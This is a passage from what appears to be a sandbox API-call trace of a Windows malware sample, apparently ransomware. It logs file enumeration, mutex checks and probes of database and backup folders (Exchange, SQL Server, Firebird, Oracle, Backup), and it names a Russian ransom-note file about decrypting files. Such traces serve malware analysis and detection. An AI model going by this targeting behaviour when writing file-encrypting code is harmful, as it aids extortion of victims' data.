lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="að\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0a4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", cchWideChar=51, lpMultiByteStr=0x18e080, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpUsedDefaultChar=0x0) returned 51 [0104.310] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0a4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllSADDNDR.DLL", lpUsedDefaultChar=0x0) returned 4 [0104.310] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0104.310] GetLastError () returned 0x12 [0104.310] FindClose (in: hFindFile=0x5733f0 | out: hFindFile=0x5733f0) returned 1 [0104.310] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.310] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.310] GlobalUnlock (hMem=0x450004) returned 0 [0104.310] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.310] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.310] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.310] GlobalUnlock (hMem=0x450004) returned 0 [0104.310] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.310] GlobalUnlock (hMem=0x45000c) returned 0 [0104.310] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5733f0 [0104.311] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.311] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.311] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.311] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.311] GlobalUnlock (hMem=0x45000c) returned 0 [0104.311] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.311] GlobalLock (hMem=0x450004) returned 0x591988 [0104.311] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.311] GlobalUnlock (hMem=0x45000c) returned 0 [0104.311] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.311] GlobalUnlock (hMem=0x450004) returned 0 [0104.311] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.311] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.311] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.311] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.311] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.311] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.311] GlobalUnlock (hMem=0x450004) returned 0 [0104.311] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.312] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.312] GlobalUnlock (hMem=0x450004) returned 0 [0104.312] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.312] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0104.312] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.312] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.312] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.312] GlobalLock (hMem=0x450004) returned 0x591988 [0104.312] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.312] GlobalUnlock (hMem=0x45000c) returned 0 [0104.312] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.312] GlobalUnlock (hMem=0x450004) returned 0 [0104.312] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.312] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0104.312] GetLastError () returned 0x12 [0104.313] FindClose (in: hFindFile=0x5733f0 | out: hFindFile=0x5733f0) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15e5ff70, ftCreationTime.dwHighDateTime=0x1d55fbd, ftLastAccessTime.dwLowDateTime=0x2d722770, ftLastAccessTime.dwHighDateTime=0x1d5af2e, ftLastWriteTime.dwLowDateTime=0x2d722770, ftLastWriteTime.dwHighDateTime=0x1d5af2e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashfxp.exe", cAlternateFileName="")) returned 1 [0104.313] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.313] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.313] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.313] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.313] GlobalUnlock (hMem=0x450004) returned 0 [0104.313] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.313] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.313] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.313] GlobalUnlock (hMem=0x450004) returned 0 [0104.313] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.313] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.314] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0104.314] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.314] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.314] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.314] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.314] GlobalLock (hMem=0x450004) returned 0x591988 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.314] GlobalUnlock (hMem=0x45000c) returned 0 [0104.314] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.314] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.314] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.314] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.314] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.314] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.314] GlobalUnlock (hMem=0x450004) returned 0 [0104.315] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.315] SysReAllocStringLen (in: pbstr=0x18f444*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared", len=0x2e | out: pbstr=0x18f444*="C:\\Program Files\\Common Files\\Microsoft Shared") returned 1 [0104.315] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.315] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.315] GlobalLock (hMem=0x450004) returned 0x591988 [0104.315] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.315] GlobalUnlock (hMem=0x45000c) returned 0 [0104.315] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.315] GlobalUnlock (hMem=0x450004) returned 0 [0104.315] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft\\Exchange Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="䱈@㐖W㏪W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.315] GetLastError () returned 0x3 [0104.315] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0104.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft SQL Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㽜V\x181")) returned 0xffffffff [0104.316] GetLastError () returned 0x2 [0104.316] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0104.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Firebird", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@丬W企@\x18㟬X\x18;")) returned 0xffffffff [0104.317] GetLastError () returned 0x2 [0104.317] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0104.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSSQL.1", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟄X\x18D")) returned 0xffffffff [0104.317] GetLastError () returned 0x2 [0104.317] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0104.318] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@丬W企@\x18䄴X\x18j")) returned 0xffffffff [0104.318] GetLastError () returned 0x2 [0104.318] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.318] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.318] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Adobe", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@佼W企@\x18㟬X\x18q")) returned 0xffffffff [0104.319] GetLastError () returned 0x2 [0104.319] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="adobe\\䄰X`") returned 6 [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.319] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Oracle", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟄X\x18y")) returned 0xffffffff [0104.319] GetLastError () returned 0x2 [0104.319] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0104.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Archive", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@僬W企@\x18㟬X\x18\x81")) returned 0xffffffff [0104.320] GetLastError () returned 0x2 [0104.320] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Backup", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@佼W企@\x18㟄X\x18\x88")) returned 0xffffffff [0104.320] GetLastError () returned 0x2 [0104.320] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="backup㟨X ") returned 6 [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, 